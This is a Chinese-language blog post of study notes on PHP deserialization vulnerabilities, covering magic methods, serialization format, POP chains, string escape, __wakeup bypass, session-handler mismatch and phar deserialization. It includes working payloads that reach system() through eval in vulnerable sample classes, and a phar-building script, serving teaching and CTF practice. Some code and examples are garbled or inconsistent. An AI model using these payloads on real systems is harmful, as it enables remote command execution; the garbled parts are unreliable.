反序列化漏洞

本文介绍了PHP中的反序列化概念,包括类、对象、成员变量和方法。讨论了魔术方法的作用,如__construct和__destruct,并展示了如何利用这些方法在对象创建和销毁时执行特定操作。此外,还探讨了序列化和反序列化的流程,以及如何通过反序列化漏洞进行潜在的安全攻击,如命令执行和数据泄露。文章还提到了PHP的序列化格式、序列化漏洞的成因和利用方法,以及如何防止敏感信息泄露。
摘要由CSDN通过智能技术生成

反序列化漏洞

该笔记大部分内容是依据B站橙子科技工作室陈腾老师的教学,学习php反序列化建议去学一下,讲的很不错
内容为学习笔记,如有侵权,联系删除

反序列化之php反序列化

类与对象的概念

面向对象是相对于面向过程来说的,过程封装好,直接调用就行。

类就是一个共享相同结构和行为的对象的集合。

内部构成:成员变量(属性)和成员函数(方法)

类里面的变量不能直接调用,需要将类进行实例化之后才能调用

在这里插入图片描述

<?php
    class MyClass {
    var$var1;   //成员变量,默认public
    $var2 = "constant string"var
    function myfunc ($arg1, $arg2) {   //成员函数 
    [..]
    }
    [..]
}
?>

对象就是类的实例

$class = new Myclass

调用对象的方法

$class->myfun();

继承:子类能继承父类的一些属性

$this释义

类或对象里面(成员方法内)去调用成员属性的时候,需要使用$this去调用,而不能直接调用

实例化与赋值:

$test = new test();
$test->name = 'xgren';
$test->team = 'rweb';

对象不能用echo输出,可以使用print_r( t e s t ) 或 v a r d u m p ( test)或var_dump( test)vardump(test)输出

魔术方法

php手册:PHP: 魔术方法 - Manual

方法作用
__construct当一个对象创建时被调用 //实例化时
__destruct当一个对象销毁时被调用
__toString当一个对象被当作一个字符串使用
__sleep在对象被序列化之前运行
__wakeup在对象被反序列化之后被调用
__serialize对对象调用serialize()方法(PHP 7.4.0 起)
__unserialize对对象调用unserialize()方法(PHP 7.4.0 起)
__call在对象上下文中调用不可访问的方法时触发
__callStatic在静态上下文中调用不可访问的方法时触发
__get用于从不可访问的属性读取数据
__set用于将数据写入不可访问的属性
__isset在不可访问的属性上调用isset()或empty()触发
__unset在不可访问的属性上使用unset()时触发
__invoke将对象作为函数调用时触发

调用方法的示例

<?php

/**
 * Class MyClass
 * Magic函数演示
 */
class MyClass
{
    public $var = "hello xgren\n";

    public function echoString(){
        echo $this->var;
    }

    public function __construct(){
        echo "__construct\n";
    }

    public function __destruct(){
        echo "__destruct\n";
    }

    public function __toString(){
        return "__toString\n";
    }
}

// 创建一个新的对象,__construct被调用
$obj = new MyClass();
// 调用该类的方法
$obj->echoString();
// 以字符形式输出,__toString方法被调用
echo $obj;
// php脚本要结束时,__destruct会被调用

为什么设计魔术函数

更加方便,比如需要在创建时做一些什么事情,销毁时做什么事情等等

序列化与反序列化的概念

序列化:serialize

反序列化:unserialize

序列化

序列化的时候不会序列化成员方法,只会序列化成员属性

序列化代码示意

<?php

/**
 * Class SerialType
 * 不同类型的序列化演示
 */
class SerialType{

    public $data;
    private $pass;
    const CONTRY = 'CHINA';

    public function __construct($data, $pass)
    {
        $this->data = $data;
        $this->pass = $pass;
    }
}
$number = 32;
$str = 'xgren';
$bool = false;
$null = NULL;
$arr = array('aa' => 1, 'bbbb' => 9);
$obj = new SerialType('somestr', true);

var_dump(serialize($number));
var_dump(serialize($str));
var_dump(serialize($bool));
var_dump(serialize($null));
var_dump(serialize($arr));
var_dump(serialize($obj));
var_dump(serialize(CONTRY));

序列化数据类型格式

类型格式
Strings:size:value;
Integeri:value;
Booleanb:value; (保存1或0)
NullN;
Arraya:size:{key definition;value definition;(repeated per element)}
ObjectO:s strlen(object name):object name:object size:{s:strlen(property name):property name:property definition;(repeated per property)}

注意,私有属性在序列化时需要在变量名前加“%00类名%00”,%00不显示,但占一个字符,受保护的在属性名前加%00*%00

除了有serialize方法可以序列化,还有一些别的方式也可以进行序列化

  • json字符串:json_encode
  • xml字符串:wddx_serialize_value
  • 二进制格式
  • 字节数组

示例:

<?php

/**
 * Class JsonClass
 * JSON和XML序列化演示
 */
class JsonClass
{
    public $word = "hello wuya";

    public $prop = array('name' => 'xgren', 'age' => 31, 'motto' => 'Apple keep doctor');
}
$obj = new JsonClass();
// 转换对象为JSON字符串
$s = json_encode($obj);
// 转换对象为XML
$x = wddx_serialize_value($obj );
echo $s;
echo "\n";
echo $x;

在敏感信息不想被返回时,可以使用_sleep重写,重新定义返回值

例子:

<?php
/**
 * Class User
 * 演示序列化中不需要序列化的字段
 */
class User{
    const SITE = 'wuya';

    public $username;
    public $nickname;
    private $password;

    public function __construct($username, $nickname, $password)
    {
        $this->username = $username;
        $this->nickname = $nickname;
        $this->password = $password;
    }

    // 重载序列化调用的方法
    public function __sleep()
    {
        // 返回需要序列化的变量名,过滤掉password变量
        return array('username', 'nickname');
    }
}
$user = new User('hackerwuya', 'xgren', '123456');
var_dump(serialize($user));
反序列化

反序列化的将序列化的值还原为一个对象,然后,然后将还原后的对象也可以调用原类中的方法,如果传递的字符串不可以序列化,则返回 FALSE,如果对象没有预定义,反序列化得到的对象是__PHP_Incomplete_Class

作用

1、传输对象

2、用作缓存(Cookie、Session)

注意,如果对象被反序列化会自动调用unserialize()和wakeup()方法,如果同时定义,unserialize会生效,wakeup()会忽略(7.4.0版本后才会有这个规则,否则只会生效wakeup

反序列化漏洞的成因

反序列化时unserialize,时的参数是可控的,可以修改序列化字符串

条件:

  • 1、unserialize函数的参数可控,比如通过GET请求传参(漏洞触发点)
  • 2、脚本中定义了有Magic方法,方法里面有向php文件做读写数据或者执行命令的操作,比如__destruct()、unlink()
  • 3、操作的内容需要有对象中的成员变量的值,比如filename

可操作函数

类别函数
命令执行exec()
passthru()
popen()
system()
文件操作file_put_contents()
file_get_contents()
unlink()

pop链的构造

反推法一步步向上找,最终找到最开始触发的魔术方法destruct等,反序列化时先触发destruct

魔术方法触发规则

在这里插入图片描述

注意,触发魔术方法之前需要先把方法所在类实例化

在反序列化中,我们能控制的数据就是对象中的属性值(成员变量所以在PHP反序列化中有一种漏洞利用方法叫”面向属性编程POP( Property Oriented Programming)
POP链就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一个payload;

字符串逃逸

前置知识

知识点1

反序列化分隔符:反序列化以;}结束,后面的字符串不影响正常的反序列化

属性逃逸:一般在数据先经过一次serialize再经过unserialize,在这个中间反序列化的字符串变多或者变少的时候有可能存在反序列化属性逃逸

知识点2

<?php
class A{
	public $v1='a';
}
echo serialize(new A());
//O:1:"A":1:{s:2:"v1";s:1:"a";}
$b='O:1:"A":1:{s:2:"v1";s:1:"a";s:2:"v2";N;}';
var_dump(unserialize($b););

成员属性不对,会回显成员属性不对:bool(false),改为正常成员属性(2)就可以进行反序列化了,字符串长度也应该和字符串长度一致

知识点3

<?php
class A{
	var $v1='a1';
	var $v2='xgren1';
}
echo serialize(new A());

$b='O:1:"A":1:{s:2:"v1";s:1:"a";s:2:"v3";s:6:"xgren2";}';
var_dump(unserialize($b););

反序列化后的对象是:

class A#1 (3) {
	public $v1 =>
	string(1) "a"
	public $v2 =>
	string(6) "xgren1"
	public $v3 =>
	string(6) "xgren2"
}

会自动获取v2属性并反序列化

知识点4

<?php
class A{
	public $v1 = "a\"b";
}
echo serialize(new A());

结果为:O:1:"A":1:{s:2:"v1";s:3:"a"b";}

字符串里面的“或}符号是字符还是格式符号,是由字符串长度3来决定的;

字符串减少

在这里插入图片描述

在这里插入图片描述

字符串增多

反序列化字符串减少逃逸:多逃逸出一个成员属性

第一个字符串减少,吃掉有效代码,在第二个字符串构造代码

反序列化增多逃逸:构造出一个逃逸成员属性

第一个字符串增多,吐出多余代码,把多余位代码构造成逃逸的成员属性

<?php
class A{
	public $v1='ls';
	public $v2='123';
}
$data = serialize(new A());
echo $data;
//O:1:"A":2:{s:2:"v1";s:2:"ls";s:2:"v2";s:3:"123";}
$data =str_replace("ls","pwd",$data);
//O:1:"A":2:{s:2:"v1";s:2:"pwd";s:2:"v2";s:3:"123";}
echo $data;
var_dump(unserialize($data));

长度不对不能反序列化,有一个字符被吐出来了;

在这里插入图片描述

wakeup绕过

漏洞成因:

如果存在_wakeup方法,调用unserialize方法前则先调用wakeup方法,但是序列化字符串中的表示对象属性个数的值大于真是属性的个数时,会绕过wakeup执行

版本:php:5—5.6.25;7—7.0.10

O:4:"test":2:{s:2:"v1";s:5:"xgren";s:2:"v2";s:3:"123"}

改为

O:4:"test":2:{s:2:"v1";s:5:"xgren";s:2:"v2";s:3:"123"}

就会绕过wakeup执行

引用

在这里插入图片描述

在这里插入图片描述

题目意思大致是某属性的值是"*",然后我需要构造另外一属性的值,让他也等于星号,但是传进去星号后会被转码替换,然后怎么才能在不传星号的情况下相等,就可是使用引用这种方法,方法的大致意思大概就是将两个地址相同(个人愚见)

ctf出题一般会整一个随机值,然后让随机值相等,那就可以使用引用的方法

session反序列化漏洞

当session_start()被调用或者php.ini中session.auto_start为1时,php内部调用会话管理器,访问用户session被序列化以后,存储到指定目录(默认为/tmp)。

存取数据的格式有很多种,常用的有三种

漏洞产生:写入格式和读取格式不一致

三种方式和其对应的表达格式:

处理器存储格式
php键名 + 竖线 + 经过 serialize() 函数序列化处理的值
php_serialize(php>=5.5.4)经过 serialize() 函数序列化处理的数组
php_binary键名的长度对应的 ASCII 字符 + 键名 + 经过serialize() 函数反序列处理的值

漏洞的产生主要来源于php和php_serialize

php:

benben|s:6:"123456";

php_serialize:

a:2:{s:6:"benben";s:5:"12345";s:1:"b";s:3:"666";}

漏洞:

读取文件

<?php 
highlight_file(__FILE__);
error_reporting(0);

ini_set('session.serialize_handler','php');
session_start();

class D{
    var $a;
    function __destruct(){
        eval($this->a);
    }
}
?>

写入session文件:

<?php
highlight_file(__FILE__);
error_reporting(0);
ini_set('session.serialize_handler','php_serialize');
session_start();
$_SESSION['ben'] = $_GET['a'];
?>

可以看到写入session文件用的是php_serialize方式写入,读入却用的是php方式读取

那我们就可以利用这一点,去构造恶意语句

<?php
class D{
	var $a="system('id');";
}
echo serialize(new D());

输出结果:

O:1:"D":1:{s:1:"a";s:13:"system('id');";}

这时候在我们输入的时候,可以使用:

?a=|O:1:"D":1:{s:1:"a";s:13:"system('id');";}

加上一个竖线进行提交,那个写入后的值变为:

a:1:{s:3:"ben";s:39:"|O:1:"D":1:{s:1:"a";s:13:"system('id');";}"}

但是在读取的时候使用了不同的规则,会把竖线前面的当作键值,后面的读为序列化后内容,那么就会被反序列化后去执行了。

phar反序列化

phar文件类似于Java的jar文件,JAR是开发Java程序一个应用,包括所有的可执行、可访问的文件,都打包进了一个JAR文件里使得部署过程十分简单。

phar(“Php ARchive”)是php里类似于jar的一种打包文件,对于php5.3或更高版本,phar后缀文件是默认开启支持的,可以直接使用它;

一般读这个文件使用文件包含;phar伪协议,可读取.phar文件;

该文件分为四个部分:
stub phar 文件标识,格式为 xxx<?php xxx; HALT COMPiLER();?>; (头部信息)

manifest 压缩文件的属性等信息,以序列化存储;contents 压缩文件的内容;

signature 签名,放在文件未尾;

漏洞产生在manifest中

Phar伪协议解析文件时,会自动触发对manifest字段的序列化字符串进行反序列化

漏洞形成:
manifest压缩文件的属性等信息,以序列化方式存储,存在一段序列化字符串;如果调用phar伪协议,可读取.phar文件,phar在读取文件时,会自动触发对manifest字段的序列化字符串进行反序列化。

条件:需要php>=5.2;联系环境需要将php.ini中将phar.readonly设为Off(注意去掉前面的分号)

能够调用的函数:

在这里插入图片描述

漏洞界面:

<?php
highlight_file(__FILE__);
error_reporting(0);
class Testobj
{
    var $output="echo 'ok';";
    function __destruct()
    {
        eval($this->output);
    }
}
if(isset($_GET['filename']))
{
    $filename=$_GET['filename'];
    var_dump(file_exists($filename));
}
?>

file_exists($filename),检验文件存不存在,返回布尔值;

生成phar文件:

<?php
highlight_file(__FILE__);
class Testobj
{
    var $output='';
}

@unlink('test.phar');   //删除之前的test.par文件(如果有)
$phar=new Phar('test.phar');  //创建一个phar对象,文件名必须以phar为后缀
$phar->startBuffering();  //开始写文件
$phar->setStub('<?php __HALT_COMPILER(); ?>');  //写入stub
$o=new Testobj();
$o->output='eval($_GET["a"]);';
$phar->setMetadata($o);//写入meta-data
$phar->addFromString("test.txt","test");  //添加要压缩的文件
$phar->stopBuffering();
?>

生成之后,使用phar伪协议,读取test.phar文件:

?filename=phar://test.phar

然后有就会自动触发对manifest字段的序列化字符串进行反序列化,存在反序列化就会自动触发destruct方法,进行eval执行,执行的是output的内容,output的内容是反序列化后的manifest的对象,又是一次eval执行,那么就可以直接在url出进行命令执行了;

?filename=phar://test.phar&a=system("ls");

就可以直接在页面执行,这个漏洞可以搭配文件上传使用,上传phar文件后进行读取。

在这里插入图片描述

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6la4Fcmf-1690374289644)(C:\Users\xgren\AppData\Roaming\Typora\typora-user-images\image-20230724213328601.png)]

phar使用条件:

  • phar文件能上传到服务器端,并且后缀名可以是任意的合理的后缀,比如png,jpg等都不影响执行。
  • 要有可用反序列化魔术方法作为跳板;
  • 要有文件操作函数,如file exists(),fopen(),file_get_contents();
  • 文件操作函数参数可控,且:、/、phar等特殊字符没有被过滤;

该笔记大部分内容是依据B站橙子科技工作室陈腾老师的教学,学习php反序列化建议去学一下,讲的很不错

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值